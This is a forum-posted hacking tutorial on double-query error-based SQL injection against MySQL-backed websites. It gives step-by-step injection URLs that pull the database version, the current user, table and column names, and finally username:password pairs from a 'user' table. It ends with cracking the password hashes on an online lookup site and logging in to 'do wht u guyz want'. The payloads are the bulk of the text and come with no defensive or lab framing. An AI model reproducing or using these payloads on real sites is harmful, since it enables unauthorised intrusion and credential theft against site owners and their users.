Sql injection [Double Query Error Based]
This tutorial is about how to hack a website through Sql injection Double Query Error Based
So for this first you need a vulnerable site..
ok after getting a vulnerable site as a normal you get the column counts
suppose it has 4 columns so next your command will be
Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
but when you press enter it gives error :-0
the error is
Code:
(select statement have different numbers of column)
so now what????? Angry
don't be so confused its time for using double query Sql injection
so your command will look like this:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
and result will look like this
Code:
"Duplicate entry '5.0.92-community-log1' for key 1"
so here '5.0.92-community-log1' is sites version.
now we have to find sites current_user so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+1' for key 1"
ok now we will find tables by this command :-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result should be
Code:
"duplicate entry 'table_name1' for key 1'
now keep increasing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
here change the limit '0,1'to 1,1 then 2,1 until you get the error.
ok now we will find tables which contains the data so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"
so here again increase the limits value until you get the table like user,,admin,,login etc etc.. Tongue
ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'column name1' for key 1'
you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php
again keep changing limits value untill you get columns like username,password etc :/
ok now we have columns username and password we need the data inside the columns so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
if the password is in hashes then you have to crack that hash
u can crack that hash with a site namely
Code:
http://md5decrypter.co.uk
so u can crack the hash
so u got user and pass login do wht u guyz want nd enjoy Big Grin
POSTED BY PATTAKHA MUNDA
